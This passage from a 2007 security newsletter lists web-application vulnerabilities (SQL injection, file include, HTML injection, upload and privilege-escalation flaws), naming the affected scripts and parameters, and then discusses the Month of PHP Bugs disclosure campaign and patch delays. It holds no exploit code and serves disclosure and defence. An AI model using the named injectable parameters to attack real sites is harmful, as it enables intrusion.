• 07.14.57 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Active Newsletter ViewNewspapers.ASP SQL Injection
• Description: Active Newsletter is a web-based newsletter and mailing-list application. It is exposed to an SQL injection vulnerability because it fails to properly sanitize input supplied to the "NewspaperID" parameter of the "ViewNewspapers.asp" script. Active Newsletter version 4.3 is affected.
• Ref: http://www.securityfocus.com/bid/23115

• 07.14.58 - CVE: Not Available
• Platform: Web Application
• Title: sBlog Local File Include
• Description: sBlog is a simple web log application. The application is exposed to a local file include issue because it fails to sufficiently sanitize the "conf_lang_default" parameter of the "lang.php" script. sBlog version 7.3 Beta is affected.
• Ref: http://www.securityfocus.com/bid/23206

• 07.14.59 - CVE: Not Available
• Platform: Web Application
• Title: Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
• Description: Kaqoo Auction is a web-based auction script. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "install_root" parameter.
• Ref: http://www.securityfocus.com/bid/23211

• 07.14.60 - CVE: Not Available
• Platform: Web Application
• Title: Softerra Time-Assistant Multiple Remote File Include Vulnerabilities
• Description: Softerra Time-Assistant is a web-based time tracking application. The application is exposed to multiple remote file include issues because it fails to properly sanitize user-supplied input before processing it in an "include()" function call which affects the "inc_dir" and "lib_dir" parameters of the "lib/timesheet.class.php" script. Softerra Time-Assistant versions 6.2 and earlier are affected.
• Ref: http://www.securityfocus.com/archive/1/464281

• 07.14.61 - CVE: Not Available
• Platform: Web Application
• Title: CodeBB PHPBB_Root_Path Remote File Include
• Description: CodeBB is a web-based forum. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "phpbb_root_path" parameter of the "pass_code.php" script. CodeBB version 1.0 Beta 2 is affected.
• Ref: http://www.securityfocus.com/bid/23185

• 07.14.62 - CVE: Not Available
• Platform: Web Application
• Title: MsxStudios Advanced Login ProfileEdit.PHP Remote File Include
• Description: Advanced Login is a web-based login application. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "root" parameter of the "engine/profiledit.php" and "engine/db/profiledit.php" scripts. Advanced Login version 0.7 is affected.
• Ref: http://www.securityfocus.com/archive/1/464147

• 07.14.63 - CVE: Not Available
• Platform: Web Application
• Title: LDAP Account Manager Unspecified HTML Injection
• Description: LDAP Account Manager is a web front end for managing accounts stored in an LDAP directory. The application is exposed to an HTML injection issue because it fails to properly sanitize user-supplied input passed to unspecified LDAP data before using it. LDAP Account Manager versions prior to 1.3.0 are affected. Ref: https://sourceforge.net/tracker/index.php?func=detail&aid=1687379&group_id=73243&atid=537211

• 07.14.64 - CVE: Not Available
• Platform: Web Application
• Title: MangoBery Multiple Remote File Include Vulnerabilities
• Description: MangoBery is a content management system. The application is exposed to multiple remote file include issues because it fails to properly sanitize user-supplied input before processing it in an "include()" function call. MangoBery version 0.5.5 is affected.
• Ref: http://www.securityfocus.com/bid/23187

• 07.14.65 - CVE: Not Available
• Platform: Web Application
• Title: AY System Solutions Web Content System Remote File Include
• Description: Web Content System is a content manager. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "path[JavascriptEdit]" parameter of the "manage/javascript/formjavascript.php" script. AY System version 2.7.1 is affected.
• Ref: http://www.securityfocus.com/bid/23171

• 07.14.66 - CVE: Not Available
• Platform: Web Application
• Title: Eve-Nuke Forums MySQL.PHP Remote File Include
• Description: Eve-Nuke Forums is a web forum. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "phpbb_root_path" parameter of the "db/mysql.php" script. Eve-Nuke Forum beta.01 is affected.
• Ref: http://www.securityfocus.com/bid/23176

• 07.14.67 - CVE: Not Available
• Platform: Web Application
• Title: JBrowser Upload.PHP3 Arbitrary File Upload
• Description: JBrowser is an image gallery application. The application is exposed to an arbitrary file upload issue because the "upload.php3" script fails to properly verify the file extensions of uploaded files. JBrowser versions 2.4 and prior are affected.
• Ref: http://www.securityfocus.com/bid/23166

• 07.14.68 - CVE: Not Available
• Platform: Web Application
• Title: IceBB Avatar Upload Remote PHP Code Execution
• Description: IceBB is a PHP-based forum solution. The application is exposed to an arbitrary PHP code execution issue because the upload function fails to properly sanitize the file type of uploaded avatars. IceBB version 1.0-rc5 is affected.
• Ref: http://www.securityfocus.com/bid/23151

• 07.14.69 - CVE: Not Available
• Platform: Web Application
• Title: C-Arbre Multiple Remote File Include Vulnerabilities
• Description: C-Arbre is a web-based document publishing system. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "root_path" parameter. C-Arbre versions 0.6PR7 and earlier are affected.
• Ref: http://www.securityfocus.com/archive/1/463925

• 07.14.70 - CVE: Not Available
• Platform: Web Application
• Title: SB-WebSoft Addressbook Local File Include
• Description: SB WebSoft Addressbook is a third party address book module for the PHP Nuke content management system. The application is exposed to a local file include issue because it fails to sufficiently sanitize the "module_name" parameter of the "addressbook.php" script. SB-WebSoft Addressbook version 1.2 is affected.
• Ref: http://www.securityfocus.com/bid/23156

• 07.14.71 - CVE: Not Available
• Platform: Web Application
• Title: Horde Groupware Webmail Edition Unspecified Parameters Multiple HTML Injection Vulnerabilities
• Description: Horde Groupware Webmail Edition is a web-based email application. It is exposed to multiple HTML injection issues because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Horde Groupware Webmail version 1.0 is affected.
• Ref: http://www.securityfocus.com/archive/1/463911

• 07.14.72 - CVE: Not Available
• Platform: Web Application
• Title: Mephisto Blog Author Comment HTML Injection
• Description: Mephisto Blog is a web log application implemented in Ruby. The application is exposed to an HTML injection issue because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Mephisto Blog version 0.7.3 is affected.
• Ref: http://www.securityfocus.com/bid/23137

• 07.14.73 - CVE: Not Available
• Platform: Web Application
• Title: ttCMS EZ_SQL.PHP Remote File Include
• Description: ttCMS is a content management system. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "lib_path" parameter of the "lib/db/ez_sql.php" script. ttCMS version 4 is affected.
• Ref: http://www.securityfocus.com/bid/23139

• 07.14.74 - CVE: Not Available
• Platform: Web Application
• Title: Satel Lite Satellite.PHP Local File Include
• Description: Satel Lite is a third party plugin for the PHP Nuke content management system. The application is exposed to a local file include issue because it fails to sufficiently sanitize the "name" parameter of the "Satellite.php" script.
• Ref: http://www.securityfocus.com/bid/23143

• 07.14.75 - CVE: Not Available
• Platform: Web Application
• Title: PBLang Administrative Account Creation Privilege Escalation
• Description: PBLang is a bulletin board application. It is exposed to a privilege escalation issue because the "register.php" script fails to properly ensure that remote users are successfully authenticated prior to carrying out actions. PBLang version 4.66z is affected.
• Ref: http://www.securityfocus.com/bid/23123

• 07.14.76 - CVE: Not Available
• Platform: Web Application
• Title: Joomla Joomlaboard Component Multiple Remote File Include Vulnerabilities
• Description: Joomlaboard (formerly SimpleBoard) is a component of Joomla! CMS. The application is exposed to multiple remote file include issues because it fails to properly sanitize user-supplied input to the "sbp" parameter of "file_upload.php" and "image_upload.php" scripts. Joomlaboard versions 1.1.0 through 1.1.5.2 are affected.
• Ref: http://www.securityfocus.com/bid/23129

• 07.14.77 - CVE: Not Available
• Platform: Web Application
• Title: Net Side CMS Index.PHP Remote File Include
• Description: Net Side CMS is a content management system. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "cms" parameter of the "index.php" script.
• Ref: http://www.securityfocus.com/bid/23130

• 07.14.78 - CVE: Not Available
• Platform: Web Application
• Title: Image_Upload Script Multiple Remote File Include Vulnerabilities
• Description: Image_Upload Script is a web-based file transfer application for images. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "AD_BODY_TEMP" parameter of the "login.php", "frontpage.php" and "forgot_pass.php" scripts. Image_Upload Script version 2.0 is affected.
• Ref: http://www.securityfocus.com/bid/23132

• 07.14.79 - CVE: CVE-2006-5763, CVE-2006-5764
• Platform: Web Application
• Title: File Upload System Multiple Remote File Include Vulnerabilities
• Description: File Upload System is a web-based file transfer application. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "AD_BODY_TEMP" parameter of the "contact.php", "login.php", "register.php", and "forgot_pass.php" scripts. File Upload System version 1.0 is affected.
• Ref: http://www.securityfocus.com/bid/23118

• 07.14.80 - CVE: Not Available
• Platform: Web Application
• Title: Mambo FlatMenu Module MosConfig_Absolute_Path Remote File Include
• Description: FlatMenu module provides an alternative menu for the Mambo content manager. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "mosConfig_absolute_path" parameter of the "mod_flatmenu.php" script. FlatMenu versions 1.07 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/23125

• 07.14.81 - CVE: Not Available
• Platform: Web Application
• Title: Mambo SWmenu MosConfig_Absolute_Path Parameter Multiple Remote File Include Vulnerabilities
• Description: SWmenu for Mambo is a web-based image manager/editor. The application is prone to multiple remote file include vulnerabilities because it fails to sufficiently sanitize user-supplied input to the "mosConfig_absolute_path" parameter of the scripts "administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php" and "components/com_swmenupro/ImageManager/Classes/ImageManager.php". Mambo version 4.0 is affected.
• Ref: http://www.securityfocus.com/bid/23116

• 07.14.82 - CVE: Not Available
• Platform: Web Application
• Title: RoseOnlineCMS Op Local File Include
• Description: RoseOnlineCMS is a PHP-based CMS application. The application is exposed to a local file include issue because it fails to sufficiently sanitize the "op" parameter of the "index.php" script. RoseOnlineCMS version 3 beta2 is affected.
• Ref: http://www.securityfocus.com/bid/23108

• 07.14.83 - CVE: Not Available
• Platform: Web Application
• Title: Philex Remote and Local File Include Vulnerabilities
• Description: Philex is a content manager. The application is exposed to remote and local file include issues because it fails to sufficiently sanitize user-supplied input to the "CssFile" parameter of the "header.inc.php" script. Philex version 0.2.3 is affected.
• Ref: http://www.securityfocus.com/bid/23111

• 07.14.84 - CVE: Not Available
• Platform: Web Application
• Title: UHP for Mambo UHP_Config.PHP Remote File Include
• Description: UHP (User Home Pages) is a web-based content manager for Mambo. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "mosConfig_absolute_path" parameter of the "uhp_config.php" script before using the input in an "include()" function call. UHP version 0.3 is affected.
• Ref: http://www.securityfocus.com/bid/23113

(c) 2007. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

THE MONTH OF PHP BUGS

The month of March brought us the Month of PHP Bugs (MOPB), a full-disclosure campaign aimed at improving the overall security in the popular PHP application server platform. Like previous Month of Bugs initiatives (Month of Brower Bugs, Month of Apple Bugs), the MOPB coordinators are releasing a new bug every day for the entire month of March. One of the heavy-hitters behind MOPB is Stefan Esser, a former member of the PHP security response team. Stefan left the PHP security team due to a lack of momentum and various impasses in fixing the security bugs he found.

Politics aside, the MOPB effort has lived up to its promise. We've seen a new bug every day. But should PHP users be worried? At the middle of the month, we performed a 'mid-month' analysis of the bugs released so far. The analysis reviewed the overall impact of the bugs, their applicability to common deployments, and how they were being fixed by the PHP developers. The mid-month analysis is available at: http://portal.spidynamics.com/blogs/jeff/archive/2007/03/19/Month-of-PHP-Bugs_3A
00_-Mid_2D00_month-analysis.aspx

The biggest conclusion of the mid-month analysis was that typical users of the latest versions of PHP (5.2.1 and 4.4.5) only needed to worry about two bugs (MOPB #1 and #2). Those two bugs allow a remote attacker to perform a denial of service attack on the server. The remaining bugs were either fixed in the last released version of PHP, or require a local user/malicious PHP script executed on the system to exploit the bug. We also reviewed the bugs released after the mid-month analysis; our general conclusion is that the analysis results/conclusions are unaffected, as the newer bugs didn't change the overall dynamics of what was already released.

This brings up two important points: if you're not running the latest version of PHP (specifically 5.2.1 and 4.4.5), you should strongly investigate upgrading immediately. Many of the MOPB releases highlight bugs fixed in those releases, and some of them can be considered quite serious. Also, if you happen to be a web hosting provider or otherwise allow arbitrary users to upload and execute PHP scripts, you are in a very serious predicament: most of the MOPB bugs require local access to exploit, and once exploited, allow the arbitrary execution of code which can circumvent PHP's built-in safemode and other security restrictions. You may consider looking to Esser et. al.'s excellent and free Hardened-PHP or Suhosin patches to proactively add additional security constraints to PHP (and help mitigate many of the MOPB bugs in the process).

So far the PHP security team/developers have been making moderate fixes in response to the MOPB bugs. However, two things get called into question. First, just because the PHP team has committed a patch, doesn't mean the bug is fixed. We've witnessed a few occasions were the fix wasn't thorough enough or improperly applied. One of the MOPB bugs (#32) actually points to a new security problem introduced by the ad-hoc fix of MOPB bug #31. So while the speed of the PHP developers in committing patches is high, we can't necessarily say the same of the quality and thoroughness of the fixes. Second, even if all the fixes are committed to the development source code repository (CVS), we still have to wait for when the PHP team rolls the latest code into an official release. People generally don't deploy beta CVS snapshots of software on their production systems-so those fixes won't see widespread deployment an official release is tested and made. And right now, there's no telling when that will happen. We hope it will occur almost immediately after the MOPB ends, but ultimately we will have to wait and see.

Even when there is an official PHP release, there can still be additional delay for various OS/package distributors (i.e. Linux, BSD) to turn the PHP release into a distribution package. For example, if you're a SuSE user, and you are using the SuSE RPM version of PHP, then after the PHP team releases the next version (i.e. 5.2.2 and/or 4.4.6), you still have to wait until SuSE either makes a new PHP RPM or back-ports the fixes to whatever PHP version branch they are using.

Curiosity got the better of us, so we decided to look at the various development mailing lists of many popular OS distributions (OpenBSD, FreeBSD, SuSE, Debian, and Fedora). We searched CVS commit lists, development discussion lists, and ports commit lists for any reference to PHP made on or after March 1st. We found OpenSuSE was the only one to have committed fixes for the MOPB bugs to their distribution package repository. SuSE also made a public statement in their latest Security Summary Report indicating they are watching the progress of the MOPB campaign and plan to act after it concludes. But aside from those two cases, our cursory look into the development efforts of some popular OS distros didn't turn up any current efforts to dealing with any of the problems uncovered by the MOPB effort. We do want to explicitly note that this isn't necessarily a bad thing-it is understandable to wait until the conclusion of the MOPB campaign before acting. Plus, this doesn't reflect any private development efforts that haven't been committed into CVS yet. Regardless, it's still an interesting observation.

Overall this is an interesting time for PHP users. While there will be a little bit of turmoil in the release and deployment of the next PHP version, overall Esser and the MOPB crew have successfully bolstered the security of PHP. Combined with their ongoing efforts on the free Hardened-PHP and Suhosin security enhancements for PHP, I think one thing is clear: Esser and the MOPB crew truly are just trying to make the world a more secure place for PHP users. And for that, we should thank them.

Resources: Month of PHP Bugs: http://www.php-security.org/

Month of PHP Bugs: Mid-month analysis http://portal.spidynamics.com/blogs/jeff/archive/2007/03/19/Month-of-PHP-Bugs_3A
00_-Mid_2D00_month-analysis.aspx

Hardened-PHP project: http://www.hardened-php.net/

Suhosin PHP security extension: http://www.hardened-php.net/ suhosin/index.html

Questions: http://portal.spidynamics.com/blogs/spilabs/default.aspx

______________________________________________________________________

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.